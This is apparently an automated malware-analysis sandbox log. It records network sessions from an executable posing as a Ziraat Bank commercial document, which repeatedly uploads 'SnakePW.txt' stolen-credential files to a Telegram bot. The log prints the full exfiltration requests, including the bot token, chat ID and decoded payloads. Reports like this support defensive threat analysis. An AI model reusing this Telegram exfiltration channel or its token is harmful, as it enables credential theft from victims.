                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 16","parameters":{"retry_after":16}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.449784149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:09 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce14d1e5270b0
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:09 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 34 64 31 65 35 32 37 30 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce14d1e5270b0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:10 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:10 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 14
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:10 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.449785149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:10 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce18fe168c18d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:10 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 38 66 65 31 36 38 63 31 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce18fe168c18dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:11 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:11 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 13
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:11 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 13","parameters":{"retry_after":13}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.449786149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:12 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce1b6d4f6292d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:12 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 62 36 64 34 66 36 32 39 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce1b6d4f6292dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:12 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:12 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 12
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:12 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 12","parameters":{"retry_after":12}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.449787149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:12 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce1dc7362965d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:12 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 64 63 37 33 36 32 39 36 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce1dc7362965dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:13 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 11
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:13 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.449788149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:13 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce1ff7f595632
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:13 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 66 66 37 66 35 39 35 36 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce1ff7f595632Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:14 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 10
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:14 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.449789149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:14 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce2227de71c1c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:14 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 32 32 37 64 65 37 31 63 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce2227de71c1cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:15 UTC369INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:15 GMT
                                      Content-Type: application/json
                                      Content-Length: 109
                                      Connection: close
                                      Retry-After: 9
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:15 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.449790149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:16 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce24a674e955f
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:16 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 34 61 36 37 34 65 39 35 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce24a674e955fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:25 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:24 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 32 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35841,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341224,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.449791149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:25 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce4f2bfc426b2
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:25 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 66 32 62 66 63 34 32 36 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce4f2bfc426b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:26 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 32 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35842,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341225,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.449792149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:26 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce539c2d259b7
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
